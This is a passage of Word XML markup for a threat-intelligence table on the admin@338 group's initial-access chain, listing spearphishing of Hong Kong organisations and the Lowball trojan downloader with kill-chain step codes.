    <w:p w14:paraId="283F49A1" w14:textId="56DAFD7B" w:rsidR="00C94979" w:rsidRDefault="00C94979" w:rsidP="00C94979">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc110935498"/>
      <w:r>
        <w:t xml:space="preserve">Attack Technique </w:t>
      </w:r>
      <w:r w:rsidR="0077286F">
        <w:t>Chain</w:t>
      </w:r>
      <w:r w:rsidR="000B2289">
        <w:t xml:space="preserve"> (Initial Access)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1984"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="37ECE3FA" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7C7F5DFE" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="637177EC" w14:textId="02E73F98" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1312859C" w14:textId="58438194" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>admin@338_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="04E835A6" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7E642632" w14:textId="6B269215" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3633029E" w14:textId="41BF2B43" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="489C623A" w14:textId="44777792" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="32711985" w14:textId="597F144C" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="7C860479" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="303A980F" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCB2BA9" w14:textId="44C76355" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6656BED2" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9550D1" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D9A48C8" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4B971F" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E3629F" w14:textId="1A641378" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="364B298E" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="291DBE41" w14:textId="72DBFA70" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74DB22D6" w14:textId="5F31A17B" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK26"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC0793E" w14:textId="3BD4FC2D" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="_Hlk109071556"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65F7F997" w14:textId="584D7E36" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B127B09" w14:textId="3B70F1F7" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7459AB68" w14:textId="157E1A09" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B76D88F" w14:textId="3CED0BF7" w:rsidR="00A77D6E" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752F0D4A" w14:textId="57E79CCA" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C238AB4" w14:textId="1F25104B" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="7EDD7EEB" w14:textId="4A483E7B" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597D053E" w14:textId="0E0CCDD8" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB84E03" w14:textId="2AECCCE4" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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1F95930C" w14:textId="4593C3D5" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435E02F1" w14:textId="1617F668" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="002828B6" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779BEAFD" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F89E6EB" w14:textId="6CF0C7A9" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4836F18D" w14:textId="192CDC0D" w:rsidR="000314D9" w:rsidRPr="00B857D7" w:rsidRDefault="00D0443B" w:rsidP="001E3C7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
            <w:r w:rsidR="001E3C7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000314D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5091D8C9" w14:textId="096A5B96" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00C67790" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> - Hong Kong based organisations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="020AF39C" w14:textId="16A7E000" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008CDE41" w14:textId="1C418900" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6538CBFA" w14:textId="10FACCBB" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286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4EF62430" w14:textId="70D4C705" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F948C9" w14:textId="446C0A5D" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F5D0AB1" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA17349" w14:textId="6C28A2CA" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D734A1" w14:textId="46411C68" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="414915B9" w14:textId="459CDDFA" w:rsidR="00A77D6E" w:rsidRPr="00C67790" w:rsidRDefault="00C67790" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Includes malicious file (</w:t>
            </w:r>
            <w:r w:rsidR="005305F1" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">trojan downloader </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lowball</w:t>
            </w:r>
            <w:r w:rsidR="004C0FBA" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> [2]</w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="0983CC02" w14:textId="5C515311" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A6DA2E" w14:textId="19317AF3" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
